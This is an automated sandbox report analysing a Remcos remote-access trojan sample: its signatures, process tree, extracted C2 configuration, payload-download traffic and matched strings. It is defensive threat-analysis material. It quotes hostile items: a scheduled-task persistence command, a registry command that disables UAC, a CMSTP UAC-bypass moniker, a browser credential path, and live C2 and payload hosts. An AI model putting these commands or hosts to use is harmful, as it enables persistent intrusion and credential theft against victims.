Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
41DLTjkmOm.exe

Overview

General Information

Sample name:41DLTjkmOm.exe
renamed because original name is a hash value
Original sample name:37c8afc687419dfc68e7f63c28c0cbbc11ca34cfd32b095711f7a8818788931f.exe
Analysis ID:1483415
MD5:922aee056087550daf3f1f73afe27981
SHA1:9343b922a98667a6ca1224ab67323f557e176de7
SHA256:37c8afc687419dfc68e7f63c28c0cbbc11ca34cfd32b095711f7a8818788931f
Tags:exeinvestdirectinsurance-com
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Silenttrinity Stager Msbuild Activity
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • 41DLTjkmOm.exe (PID: 516 cmdline: "C:\Users\user\Desktop\41DLTjkmOm.exe" MD5: 922AEE056087550DAF3F1F73AFE27981)
    • MSBuild.exe (PID: 1444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 3984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • cmd.exe (PID: 3196 cmdline: "cmd.exe" /c schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3548 cmdline: schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • Lamsses.exe (PID: 3496 cmdline: C:\Users\user\AppData\Roaming\Lamsses.exe MD5: 922AEE056087550DAF3F1F73AFE27981)
    • MSBuild.exe (PID: 6272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "bignight.net:3363:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SIVP85", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.4670994702.0000000002F6F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.2253404142.00000000011F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 14 entries
              SourceRuleDescriptionAuthorStrings
              0.2.41DLTjkmOm.exe.1319b3d8.3.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                0.2.41DLTjkmOm.exe.1319b3d8.3.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  0.2.41DLTjkmOm.exe.1319b3d8.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x690a8:$a1: Remcos restarted by watchdog!
                  • 0x69620:$a3: %02i:%02i:%02i:%03i
                  0.2.41DLTjkmOm.exe.1319b3d8.3.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x630fc:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6316c:$str_b2: Executing file:
                  • 0x641ec:$str_b3: GetDirectListeningPort
                  • 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x63d18:$str_b7: \update.vbs
                  • 0x63194:$str_b9: Downloaded file:
                  • 0x63180:$str_b10: Downloading file:
                  • 0x63224:$str_b12: Failed to upload file:
                  • 0x641b4:$str_b13: StartForward
                  • 0x641d4:$str_b14: StopForward
                  • 0x63c70:$str_b15: fso.DeleteFile "
                  • 0x63c04:$str_b16: On Error Resume Next
                  • 0x63ca0:$str_b17: fso.DeleteFolder "
                  • 0x63214:$str_b18: Uploaded file:
                  • 0x631d4:$str_b19: Unable to delete:
                  • 0x63c38:$str_b20: while fso.FileExists("
                  • 0x636b1:$str_c0: [Firefox StoredLogins not found]
                  0.2.41DLTjkmOm.exe.1319b3d8.3.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x62f7c:$s1: CoGetObject
                  • 0x62f90:$s1: CoGetObject
                  • 0x62fac:$s1: CoGetObject
                  • 0x6cf38:$s1: CoGetObject
                  • 0x62f3c:$s2: Elevation:Administrator!new:
                  Click to see the 23 entries

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3984, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49718
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f, CommandLine: schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd.exe" /c schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3196, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f, ProcessId: 3548, ProcessName: schtasks.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 3984, TargetFilename: C:\ProgramData\remcos\logs.dat
                  No Snort rule has matched
                  Timestamp:2024-07-27T11:37:17.560699+0200
                  SID:2036594
                  Source Port:49717
                  Destination Port:3363
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-27T11:38:07.387913+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49725
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T11:37:15.216940+0200
                  SID:2036594
                  Source Port:49716
                  Destination Port:3363
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-27T11:37:12.316519+0200
                  SID:2803274
                  Source Port:49714
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T11:37:13.295240+0200
                  SID:2803274
                  Source Port:49715
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T11:37:17.084329+0200
                  SID:2803304
                  Source Port:49718
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-07-27T11:37:29.881105+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49719
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "bignight.net:3363:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SIVP85", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: bignight.netVirustotal: Detection: 9%Perma Link
                  Source: bignight.netVirustotal: Detection: 9%Perma Link
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeVirustotal: Detection: 22%Perma Link
                  Source: 41DLTjkmOm.exeVirustotal: Detection: 22%Perma Link
                  Source: 41DLTjkmOm.exeReversingLabs: Detection: 42%
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4670994702.0000000002F6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2253404142.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 41DLTjkmOm.exe PID: 516, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3984, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6272, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_00433837
                  Source: 41DLTjkmOm.exe, 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_edfe3d56-d

                  Exploits

                  barindex
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 41DLTjkmOm.exe PID: 516, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6272, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004074FD _wcslen,CoGetObject,9_2_004074FD
                  Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49722 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.6:49714 version: TLS 1.2
                  Source: 41DLTjkmOm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\FAG\OneDrive\Desktop\Outputs\Wowaegok.pdb source: 41DLTjkmOm.exe, Lamsses.exe.0.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409253
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C291
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C34D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409665
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0044E879 FindFirstFileExA,9_2_0044E879
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_0040880C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040783C FindFirstFileW,FindNextFileW,9_2_0040783C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419AF5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407C97

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: bignight.net
                  Source: global trafficTCP traffic: 192.168.2.6:49716 -> 146.70.57.34:3363
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewIP Address: 146.70.57.34 146.70.57.34
                  Source: Joe Sandbox ViewASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL
                  Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49722 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeCode function: 0_2_00007FFD3458234E InternetReadFile,0_2_00007FFD3458234E
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/MangoDB.ytyp HTTP/1.1User-Agent: PARAM_CLASS_MINHost: investdirectinsurance.com
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Paatapas.ytyp HTTP/1.1User-Agent: PARAM_CLASS_MINHost: investdirectinsurance.com
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: investdirectinsurance.com
                  Source: global trafficDNS traffic detected: DNS query: bignight.net
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: MSBuild.exe, 00000004.00000002.4670639752.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/jso
                  Source: MSBuild.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: 41DLTjkmOm.exe, 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: MSBuild.exe, 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp?
                  Source: 41DLTjkmOm.exe, 00000000.00000002.2248655300.000000001BEE8000.00000004.00000020.00020000.00000000.sdmp, 41DLTjkmOm.exe, 00000000.00000002.2246234093.00000000013C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/
                  Source: 41DLTjkmOm.exe, Lamsses.exe.0.drString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytyp
                  Source: 41DLTjkmOm.exe, 00000000.00000002.2246234093.0000000001364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytypcm#_
                  Source: 41DLTjkmOm.exe, 00000000.00000002.2246234093.0000000001364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytypim)_
                  Source: 41DLTjkmOm.exe, Lamsses.exe.0.drString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Paatapas.ytyp
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownHTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.6:49714 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000009_2_0040A2B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B70E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004168C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B70E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,9_2_0040A3E0

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4670994702.0000000002F6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2253404142.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 41DLTjkmOm.exe PID: 516, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3984, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6272, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041C9E2 SystemParametersInfoW,9_2_0041C9E2

                  System Summary

                  barindex
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
